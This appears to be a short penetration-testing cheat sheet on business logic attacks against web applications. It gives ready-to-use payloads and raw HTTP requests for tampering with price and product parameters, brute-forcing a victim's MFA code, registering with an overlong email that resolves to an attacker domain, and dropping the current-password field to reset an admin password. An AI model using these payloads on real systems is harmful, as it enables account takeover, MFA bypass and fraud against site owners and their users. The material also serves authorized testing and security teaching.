Business Logic Attack
Last modified: 2024-04-13
Web
Business Logic is the part of the program that encodes the real-world business rules that determine how data can be created, stored, and changed.
Change Request Params to Unexpected Values
productId=-1
productId=a
productId= # empty value
price=-1000
price=1000-
price=%1000
price=%-1000
Exploit Broken Two-Factor
Brute force a MFA Code
POST /login HTTP/1.1
Cookie: verify=victim
...
<!-- Brute force digits code -->
mfa-code=1111
Loop Back with 2,147,483,647
No contents yet.
Register with Too Long-Length Email Address
POST /register HTTP/1.1
...
username=attacker&password=pass1&email=aaaaaaaaaaaaa...aa@vulnerable.com.attacker.com
Remove the Specific POST Params
POST /change-password HTTP/1.1
...
<!-- Remove 'current-password' parameter -->
username=admin&new-password-1=newpass&new-password-2=newpass